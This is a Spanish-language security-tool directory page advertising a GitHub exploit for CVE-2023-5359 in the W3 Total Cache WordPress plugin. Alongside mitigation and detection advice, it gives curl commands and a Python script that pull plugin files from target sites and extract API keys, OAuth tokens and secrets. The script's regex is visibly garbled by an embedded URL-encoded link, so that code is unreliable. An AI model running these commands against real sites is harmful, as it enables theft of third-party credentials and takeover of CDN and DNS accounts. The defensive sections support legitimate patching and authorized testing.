Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-5359 — Escáner CVE-2023-5359 para la vulnerabilidad de almacenamiento en texto claro en W3 Total Cache. Detecta credenciales expuestas (claves API, tokens OAuth) en archivos PHP de acceso público. Incluye scripts de explotación manual y automatizada. | Kitploit
Herramientas/GitHubGitHub/enzocipher/cve-2023-5359
Escáneres de VulnerabilidadesAtaques de ContraseñasExplotaciónRecopilación de InformaciónSeguridad WebAprendizaje y Educación
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

Escáner CVE-2023-5359 para la vulnerabilidad de almacenamiento en texto claro en W3 Total Cache. Detecta credenciales expuestas (claves API, tokens OAuth) en archivos PHP de acceso público. Incluye scripts de explotación manual y automatizada.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-5359 - Vulnerabilidad de almacenamiento en texto claro en W3 Total Cache

Descripción

CVE-2023-5359 es una vulnerabilidad de almacenamiento en texto claro que afecta al plugin de WordPress W3 Total Cache en versiones ≤ 2.7.5. Esta vulnerabilidad permite a atacantes remotos acceder a credenciales sensibles almacenadas en archivos PHP sin cifrar que son accesibles públicamente.

Severidad

  • Puntuación CVSS: 7.5 (Alta)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Tipo: Exposición de información sensible

Vulnerabilidad Técnica

Causa Raíz

W3 Total Cache almacena configuraciones y credenciales de API en archivos PHP dentro del directorio /wp-content/plugins/w3-total-cache/ sin protección adecuada. Estos archivos son accesibles a través de HTTP, exponiendo:

  • Claves API (CloudFlare, Google, etc.)
  • Secretos de cliente
  • Tokens OAuth
  • Credenciales de servicios externos

Archivos Afectados

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Explotación

Método Manual

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script Automatizado

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/main/%5B%5E%27%5C%22%5D%2B)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impacto

Un atacante puede obtener:

  1. Credenciales de CloudFlare - Tomar control de CDN y DNS
  2. Claves API para servicios externos - Acceder a cuentas externas
  3. Tokens OAuth - Suplantar identidad
  4. Configuraciones de caché - Manipular contenido servido

Mitigación

Solución Inmediata

  1. Actualizar a W3 Total Cache ≥ 2.7.6
  2. Restringir el acceso a los archivos PHP en el directorio de plugins
  3. Revocar y regenerar todas las credenciales expuestas

Configuración Segura

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Detección

Comando de Verificación

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicadores de Compromiso

  • Actividad inusual en APIs externas
  • Cambios en configuraciones de CloudFlare
  • Tráfico desde IPs no autorizadas a servicios conectados

Ejemplo de Hallazgo

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Referencias

  • CVE-2023-5359
  • W3 Total Cache Changelog
  • WordPress Security Team

Aviso Legal

Este repositorio es solo para fines educativos y pruebas de penetración autorizadas. El uso malicioso de esta información está estrictamente prohibido.


¿Encontraste útil esta información? ¡Dale una estrella al repositorio!

Última actualización: noviembre de 2025

Descargar herramienta